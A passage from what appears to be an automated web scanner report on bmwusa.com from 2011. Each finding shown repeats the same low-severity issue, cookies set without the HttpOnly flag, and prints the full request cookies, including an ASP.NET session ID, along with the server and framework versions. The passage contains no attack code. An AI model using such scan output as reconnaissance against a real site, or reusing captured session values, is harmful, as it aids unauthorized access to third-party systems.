Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:52:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:12:20 GMT;path=/
Content-Length: 202463


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.398. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive50i/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x5/xdrive50i/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x5/xdrive50i/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:54:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:14:38 GMT;path=/
Content-Length: 214419


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.399. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive50i/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x5/xdrive50i/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x5/xdrive50i/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:56:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:16:25 GMT;path=/
Content-Length: 223508


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.400. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive50i/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x5/xdrive50i/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x5/xdrive50i/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:54:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:14:48 GMT;path=/
Content-Length: 213474


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.401. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive50i/x5seriessavmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x5/xdrive50i/x5seriessavmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x5/xdrive50i/x5seriessavmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:55:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:15:48 GMT;path=/
Content-Length: 202181


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.402. http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x6/activehybridx6/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x6/activehybridx6/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:01:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:21:12 GMT;path=/
Content-Length: 212497


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.403. http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x6/activehybridx6/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x6/activehybridx6/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:59:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:19:15 GMT;path=/
Content-Length: 212498


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.404. http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x6/activehybridx6/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x6/activehybridx6/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:01:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:21:07 GMT;path=/
Content-Length: 229245


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.405. http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/features_and_specs/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x6/activehybridx6/features_and_specs/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x6/activehybridx6/features_and_specs/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:00:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:20:55 GMT;path=/
Content-Length: 229246


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.406. http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x6/activehybridx6/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x6/activehybridx6/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:00:10 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:20:10 GMT;path=/
Content-Length: 215531


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.407. http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/modelhighlights/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x6/activehybridx6/modelhighlights/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x6/activehybridx6/modelhighlights/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:59:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:19:49 GMT;path=/
Content-Length: 215532


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.408. http://www.bmwusa.com/standard/content/vehicles/2011/x6/activehybridx6/x6seriessacmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x6/activehybridx6/x6seriessacmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x6/activehybridx6/x6seriessacmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:00:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:20:51 GMT;path=/
Content-Length: 202378


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.409. http://www.bmwusa.com/standard/content/vehicles/2011/x6/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x6/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x6/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:58:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:18:17 GMT;path=/
Content-Length: 195775


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.410. http://www.bmwusa.com/standard/content/vehicles/2011/x6/x6explore.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x6/x6explore.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x6/x6explore.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:59:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:19:12 GMT;path=/
Content-Length: 179285


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.411. http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive35i/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x6/xdrive35i/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/x6/xdrive35i/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
